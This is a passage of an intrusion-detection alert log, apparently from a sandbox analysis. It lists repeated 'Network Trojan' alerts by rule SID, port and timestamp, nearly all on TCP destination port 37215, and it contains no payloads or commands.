                SID:2835222
                Source Port:41138
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.662840
                SID:2829579
                Source Port:58190
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.338988
                SID:2829579
                Source Port:40380
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849764
                SID:2835222
                Source Port:32964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971178
                SID:2835222
                Source Port:55230
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.407590
                SID:2829579
                Source Port:58490
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181218
                SID:2829579
                Source Port:41546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.364892
                SID:2829579
                Source Port:44680
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.323125
                SID:2835222
                Source Port:59790
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.880239
                SID:2835222
                Source Port:45600
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.934424
                SID:2835222
                Source Port:47064
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.714835
                SID:2829579
                Source Port:58990
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504762
                SID:2835222
                Source Port:35720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848076
                SID:2829579
                Source Port:44864
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.385656
                SID:2835222
                Source Port:35868
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227634
                SID:2835222
                Source Port:33182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.830978
                SID:2829579
                Source Port:41344
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.642755
                SID:2835222
                Source Port:40506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.977327
                SID:2829579
                Source Port:53748
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.717636
                SID:2835222
                Source Port:44494
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.083350
                SID:2835222
                Source Port:46152
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.344448
                SID:2829579
                Source Port:53906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.898420
                SID:2829579
                Source Port:39146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.408435
                SID:2835222
                Source Port:59272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012217
                SID:2835222
                Source Port:58146
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.382695
                SID:2835222
                Source Port:43924
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568454
                SID:2829579
                Source Port:34288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.789827
                SID:2835222
                Source Port:45324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917241
                SID:2835222
                Source Port:59266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.453169
                SID:2829579
                Source Port:34346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.245829
                SID:2835222
                Source Port:57954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028497
                SID:2829579
                Source Port:34984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.766104
                SID:2835222
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055559
                SID:2829579
                Source Port:60716
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.071604
                SID:2829579
                Source Port:49118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411938
                SID:2835222
                Source Port:33310
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022169
                SID:2829579
                Source Port:44166
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.776249
                SID:2835222
                Source Port:36142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.014292
                SID:2835222
                Source Port:33006
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792028
                SID:2829579
                Source Port:55280
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.162375
                SID:2829579
                Source Port:37246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641793
                SID:2829579
                Source Port:56552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073852
                SID:2835222
                Source Port:54948
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.200154
                SID:2829579
                Source Port:53558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762146
                SID:2835222
                Source Port:52068
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275227
                SID:2829579
                Source Port:43274
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.073783
                SID:2829579
                Source Port:46978
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.881917
                SID:2835222
                Source Port:53170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.367423
                SID:2835222
                Source Port:51206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471388
                SID:2829579
                Source Port:34908
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.082044
                SID:2835222
                Source Port:58606
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420412
                SID:2835222
                Source Port:53538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518857
                SID:2835222
                Source Port:49106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848509
                SID:2829579
                Source Port:56218
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717789
                SID:2829579
                Source Port:56896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.075075
                SID:2829579
                Source Port:52730
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225863
                SID:2829579
                Source Port:39034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.295200
                SID:2829579
                Source Port:38502
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792578
                SID:2829579
                Source Port:57720
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.163593
                SID:2829579
                Source Port:39910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.790666
                SID:2835222
                Source Port:46262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.933359
                SID:2835222
                Source Port:36988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.227283
                SID:2835222
                Source Port:48022
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.275465
                SID:2829579
                Source Port:49800
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726373
                SID:2829579
                Source Port:46270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.641582
                SID:2835222
                Source Port:48742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132242
                SID:2835222
                Source Port:54670
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114919
                SID:2835222
                Source Port:57546
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074460
                SID:2829579
                Source Port:60038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.225253
                SID:2829579
                Source Port:50254
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.181482
                SID:2835222
                Source Port:39204
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:56.226702
                SID:2829579
                Source Port:55142
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.831205
                SID:2829579
                Source Port:53872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.159837
                SID:2829579
                Source Port:50840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.027700
                SID:2829579
                Source Port:60362
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.944234
                SID:2835222
                Source Port:39408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805910
                SID:2829579
                Source Port:42894
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.079211
                SID:2829579
                Source Port:54270
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.146550
                SID:2835222
                Source Port:34358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:12.614170
                SID:2835222
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.805301
                SID:2835222
                Source Port:43622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943381
                SID:2835222
                Source Port:56968
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:27.001983
                SID:2829579
                Source Port:50112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132586
                SID:2835222
                Source Port:37684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685398
                SID:2829579
                Source Port:57684
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.022047
                SID:2835222
                Source Port:40388
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149079
                SID:2829579
                Source Port:50598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.667980
                SID:2829579
                Source Port:36932
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.365590
                SID:2829579
                Source Port:44782
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.132733
                SID:2829579
                Source Port:40134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762253
                SID:2835222
                Source Port:58976
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.943464
                SID:2835222
                Source Port:57740
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.072963
                SID:2835222
                Source Port:44374
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201315
                SID:2835222
                Source Port:39510
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.792246
                SID:2829579
                Source Port:41080
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.850457
                SID:2835222
                Source Port:45988
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.718076
                SID:2829579
                Source Port:53812
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.978258
                SID:2835222
                Source Port:33070
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012277
                SID:2829579
                Source Port:39818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.182278
                SID:2835222
                Source Port:39840
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.661732
                SID:2829579
                Source Port:55210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.979429
                SID:2835222
                Source Port:43648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022650
                SID:2835222
                Source Port:47906
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858483
                SID:2829579
                Source Port:55018
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074652
                SID:2829579
                Source Port:42842
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.147085
                SID:2835222
                Source Port:45742
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:33.133764
                SID:2829579
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.762330
                SID:2835222
                Source Port:60862
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.670390
                SID:2835222
                Source Port:36604
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420870
                SID:2829579
                Source Port:56874
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.675847
                SID:2829579
                Source Port:58406
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.470246
                SID:2829579
                Source Port:50936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.381658
                SID:2835222
                Source Port:39798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.986083
                SID:2829579
                Source Port:43328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.322197
                SID:2829579
                Source Port:51348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.340643
                SID:2829579
                Source Port:48824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.700634
                SID:2829579
                Source Port:33482
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.849836
                SID:2829579
                Source Port:57610
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.676213
                SID:2829579
                Source Port:56120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.081921
                SID:2835222
                Source Port:51678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.859762
                SID:2829579
                Source Port:43706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761513
                SID:2835222
                Source Port:43162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.176532
                SID:2829579
                Source Port:41110
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.678527
                SID:2835222
                Source Port:42314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.012466
                SID:2829579
                Source Port:36112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.013739
                SID:2835222
                Source Port:60914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.848725
                SID:2829579
                Source Port:56250
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.165256
                SID:2835222
                Source Port:34746
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.942793
                SID:2835222
                Source Port:56076
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.726113
                SID:2829579
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.501551
                SID:2829579
                Source Port:35440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.185691
                SID:2835222
                Source Port:47376
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.113738
                SID:2835222
                Source Port:50202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.184246
                SID:2835222
                Source Port:43450
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.806576
                SID:2829579
                Source Port:42108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:34.371586
                SID:2840516
                Source Port:23
                Destination Port:49612
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.913355
                SID:2829579
                Source Port:54984
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.022377
                SID:2835222
                Source Port:46512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.732821
                SID:2835222
                Source Port:45030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.290661
                SID:2829579
                Source Port:48134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.965642
                SID:2835222
                Source Port:55046
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:45.984210
                SID:2835222
                Source Port:49188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:54.201922
                SID:2829579
                Source Port:50722
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.717837
                SID:2829579
                Source Port:48628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.052622
                SID:2829579
                Source Port:33940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.563492
                SID:2829579
                Source Port:49164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.366853
                SID:2835222
                Source Port:60340
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.114973
                SID:2835222
                Source Port:57538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180449
                SID:2835222
                Source Port:46744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:36.702404
                SID:2829579
                Source Port:55294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.568808
                SID:2835222
                Source Port:48752
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847727
                SID:2829579
                Source Port:56082
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:06.471862
                SID:2835222
                Source Port:59116
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.011930
                SID:2835222
                Source Port:59126
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.406763
                SID:2829579
                Source Port:40808
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.028004
                SID:2829579
                Source Port:40946
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:35.180292
                SID:2835222
                Source Port:33266
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672514
                SID:2829579
                Source Port:44688
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.420809
                SID:2829579
                Source Port:55618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.761268
                SID:2835222
                Source Port:53798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:43.971569
                SID:2835222
                Source Port:53672
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518024
                SID:2829579
                Source Port:56424
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321121
                SID:2835222
                Source Port:58958
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.917373
                SID:2829579
                Source Port:55954
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:18.777929
                SID:2829579
                Source Port:33768
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:16.715634
                SID:2835222
                Source Port:38914
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:24.943140
                SID:2829579
                Source Port:44400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:26.999358
                SID:2835222
                Source Port:47764
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:58.291897
                SID:2829579
                Source Port:45030
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:37.761638
                SID:2835222
                Source Port:49236
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.145775
                SID:2829579
                Source Port:40128
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.827754
                SID:2829579
                Source Port:38866
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.685541
                SID:2835222
                Source Port:37188
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.518125
                SID:2835222
                Source Port:34916
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055298
                SID:2829579
                Source Port:38558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.055746
                SID:2829579
                Source Port:57806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:00.321356
                SID:2835222
                Source Port:58884
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:48.030673
                SID:2835222
                Source Port:46710
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.057763
                SID:2829579
                Source Port:43590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:29.015232
                SID:2835222
                Source Port:37294
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:20.807156
                SID:2829579
                Source Port:45472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.858836
                SID:2829579
                Source Port:46548
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.423545
                SID:2835222
                Source Port:40896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:10.543535
                SID:2835222
                Source Port:48132
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:52.149114
                SID:2829579
                Source Port:43262
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383203
                SID:2835222
                Source Port:37754
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.383651
                SID:2835222
                Source Port:50678
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.878423
                SID:2835222
                Source Port:43398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:04.411137
                SID:2829579
                Source Port:44596
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:08.504812
                SID:2835222
                Source Port:42778
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:22.857974
                SID:2835222
                Source Port:54228
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.668395
                SID:2835222
                Source Port:47378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:41.847013
                SID:2835222
                Source Port:46440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:14.672015
                SID:2829579
                Source Port:59706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:02.369039
                SID:2835222
                Source Port:55342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:39.808814
                SID:2829579
                Source Port:49048
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:43:50.074343
                SID:2835222
                Source Port:56012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:06/14/24-10:44:31.051512
                SID:2829579
                Source Port:36180
                Destination Port:37215
